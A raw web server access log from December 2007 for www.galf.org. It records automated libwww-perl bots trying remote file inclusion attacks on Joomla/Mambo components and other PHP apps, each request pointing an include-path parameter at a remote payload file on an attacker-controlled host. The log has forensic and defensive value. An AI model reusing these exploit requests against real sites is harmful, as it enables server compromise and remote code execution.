64.34.193.87 - - [09/Dec/2007:18:41:20 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.34.193.87 - - [09/Dec/2007:18:41:21 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:18:42:06 -0800] "GET /logs/index2.php?url_page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:18:42:06 -0800] "GET /index2.php?url_page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.194.246 - - [09/Dec/2007:18:42:10 -0800] "GET /logs/index2.php?url_page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.194.246 - - [09/Dec/2007:18:42:12 -0800] "GET /logs/index2.php?url_page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
67.15.194.246 - - [09/Dec/2007:18:42:15 -0800] "GET /index2.php?url_page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.194.246 - - [09/Dec/2007:18:42:15 -0800] "GET /index2.php?url_page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.208.228.216 - - [09/Dec/2007:18:42:56 -0800] "GET /logs//index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.208.228.216 - - [09/Dec/2007:18:42:57 -0800] "GET //index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.118.170.11 - - [09/Dec/2007:18:43:26 -0800] "GET /rss.php?phpraid_dir=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.118.170.11 - - [09/Dec/2007:18:43:26 -0800] "GET /logs/rss.php?phpraid_dir=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
63.113.69.15 - - [09/Dec/2007:18:43:56 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.113.69.15 - - [09/Dec/2007:18:43:57 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.113.69.15 - - [09/Dec/2007:18:43:57 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.113.69.15 - - [09/Dec/2007:18:43:58 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.127.194.226 - - [09/Dec/2007:18:44:16 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mathiasmu.biz/HMS/htdocs/main/menu/menu.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.193.87 - - [09/Dec/2007:18:46:20 -0800] "GET /logs/index2.php?url_page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
64.34.193.87 - - [09/Dec/2007:18:46:21 -0800] "GET /index2.php?url_page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:47:06 -0800] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:47:06 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:47:07 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:47:39 -0800] "GET /logs/access_070730.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.34.193.87 - - [09/Dec/2007:18:47:41 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
64.34.193.87 - - [09/Dec/2007:18:47:42 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.230.10.215 - - [09/Dec/2007:18:47:58 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.webmasterserve.com/impex/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.10.215 - - [09/Dec/2007:18:47:59 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.webmasterserve.com/impex/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
128.46.156.155 - - [09/Dec/2007:18:48:03 -0800] "GET /logs//index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
128.46.156.155 - - [09/Dec/2007:18:48:03 -0800] "GET //index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.79.2 - - [09/Dec/2007:18:48:10 -0800] "GET /logs/index.php?inc=http://localizit.com/data/ash.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.79.2 - - [09/Dec/2007:18:48:10 -0800] "GET /index.php?inc=http://localizit.com/data/ash.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
90.156.145.60 - - [09/Dec/2007:18:48:44 -0800] "GET /logs//index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
90.156.145.60 - - [09/Dec/2007:18:48:45 -0800] "GET //index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:49:32 -0800] "GET /logs/access_071014.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:49:32 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:49:32 -0800] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.34.193.87 - - [09/Dec/2007:18:49:36 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.34.193.87 - - [09/Dec/2007:18:49:36 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:50:07 -0800] "GET /logs/access_070625.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
116.12.54.154 - - [09/Dec/2007:18:50:18 -0800] "GET /logs/access_070917.log/modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
116.12.54.154 - - [09/Dec/2007:18:50:19 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
116.12.54.154 - - [09/Dec/2007:18:50:19 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
88.80.203.18 - - [09/Dec/2007:18:50:21 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tarcisiobr.kit.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.34.193.87 - - [09/Dec/2007:18:51:03 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.34.193.87 - - [09/Dec/2007:18:51:03 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:18:51:06 -0800] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:18:51:06 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
202.60.70.58 - - [09/Dec/2007:18:51:06 -0800] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
116.12.54.154 - - [09/Dec/2007:18:51:36 -0800] "GET /logs/access_070917.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
116.12.54.154 - - [09/Dec/2007:18:51:36 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
116.12.54.154 - - [09/Dec/2007:18:51:37 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
202.60.70.58 - - [09/Dec/2007:18:51:42 -0800] "GET /logs/access_070917.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.10.195.202 - - [09/Dec/2007:18:52:13 -0800] "GET /logs/access_070806.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.10.195.202 - - [09/Dec/2007:18:52:19 -0800] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
140.130.42.103 - - [09/Dec/2007:18:52:19 -0800] "GET /logs/access_071008.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://vhyan.com/scn/asccmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.10.195.202 - - [09/Dec/2007:18:52:23 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
116.12.54.154 - - [09/Dec/2007:18:52:23 -0800] "GET /logs/access_071014.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.94.10.114 - - [09/Dec/2007:18:52:23 -0800] "GET /logs//index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.94.10.114 - - [09/Dec/2007:18:52:23 -0800] "GET //index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:52:25 -0800] "GET /logs/access_070917.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:52:25 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:52:25 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:52:45 -0800] "GET /logs/access_070625.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
202.60.70.58 - - [09/Dec/2007:18:52:55 -0800] "GET /logs/access_071014.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:18:52:55 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:18:52:56 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:18:53:39 -0800] "GET /logs/access_070917.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
204.11.233.206 - - [09/Dec/2007:18:53:51 -0800] "GET /logs/access_071014.log/components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:53:51 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:53:51 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.22 - - [09/Dec/2007:18:53:57 -0800] "GET /labia/?D=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:18:54:08 -0800] "GET /logs/access_070917.log/modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:18:54:08 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:18:54:09 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.10.195.202 - - [09/Dec/2007:18:54:16 -0800] "GET /logs/access_070827.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.32.85.218 - - [09/Dec/2007:18:54:19 -0800] "GET /logs//index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.32.85.218 - - [09/Dec/2007:18:54:19 -0800] "GET //index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.190.193.116 - - [09/Dec/2007:18:56:20 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.190.193.116 - - [09/Dec/2007:18:56:20 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.98.8.192 - - [09/Dec/2007:18:57:49 -0800] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://www.babypeach.com/images/categories/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.8.192 - - [09/Dec/2007:18:57:49 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.babypeach.com/images/categories/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.8.192 - - [09/Dec/2007:18:57:49 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.babypeach.com/images/categories/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.202.3.192 - - [09/Dec/2007:18:58:15 -0800] "GET /logs//index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
211.202.3.192 - - [09/Dec/2007:18:58:16 -0800] "GET //index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.98.8.192 - - [09/Dec/2007:18:58:59 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.babypeach.com/images/categories/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.139.152.130 - - [09/Dec/2007:18:59:38 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.139.152.130 - - [09/Dec/2007:18:59:38 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.72.149.141 - - [09/Dec/2007:18:59:40 -0800] "GET /index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://tutorialonline.info/portal/cache/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.208.170 - - [09/Dec/2007:19:00:48 -0800] "GET /logs/access_071028.log/nav.php?pagina=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:19:00:48 -0800] "GET /nav.php?pagina=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:19:00:48 -0800] "GET /logs/nav.php?pagina=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.208.170 - - [09/Dec/2007:19:00:58 -0800] "GET /logs/access_071029.log/nav.php?pagina=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
116.12.54.154 - - [09/Dec/2007:19:02:19 -0800] "GET /logs/access_071014.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
116.12.54.154 - - [09/Dec/2007:19:02:19 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
116.12.54.154 - - [09/Dec/2007:19:02:20 -0800] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:19:02:47 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
204.11.233.206 - - [09/Dec/2007:19:02:47 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
116.12.54.154 - - [09/Dec/2007:19:03:10 -0800] "GET /logs/access_070625.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.118.170.11 - - [09/Dec/2007:19:03:15 -0800] "GET /logs/access_070917.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.118.170.11 - - [09/Dec/2007:19:03:15 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.118.170.11 - - [09/Dec/2007:19:03:16 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:19:03:44 -0800] "GET /logs/access_071008.log/index.php?_REQUEST=&_REQUEST[option]=option,com_extcalendar&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:19:03:45 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_extcalendar&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:19:03:45 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_extcalendar&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
210.118.170.11 - - [09/Dec/2007:19:03:45 -0800] "GET /logs/access_071014.log/main.php?d1=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.118.170.11 - - [09/Dec/2007:19:03:46 -0800] "GET /main.php?d1=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.118.170.11 - - [09/Dec/2007:19:03:46 -0800] "GET /logs/main.php?d1=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.118.170.11 - - [09/Dec/2007:19:03:50 -0800] "GET /logs/access_070917.log/main.php?d1=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.118.170.11 - - [09/Dec/2007:19:04:10 -0800] "GET /logs/access_071014.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.91.249.176 - - [09/Dec/2007:19:04:36 -0800] "GET /logs/access_070826.log/modules/My_eGallery/index.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.91.249.176 - - [09/Dec/2007:19:04:37 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.91.249.176 - - [09/Dec/2007:19:04:37 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:19:05:44 -0800] "GET /logs/access_071028.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:19:06:06 -0800] "GET /logs/access_071014.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:19:06:07 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:19:06:07 -0800] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:19:06:15 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.67.231.247 - - [09/Dec/2007:19:06:21 -0800] "GET /logs/Webcalendar/ws/login.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.67.231.247 - - [09/Dec/2007:19:06:21 -0800] "GET /Webcalendar/ws/login.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.109.250 - - [09/Dec/2007:19:06:27 -0800] "GET /logs/Webcalendar/ws/login.php?noSet=0&includedir=http://aspato-go.com/cartt/images/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
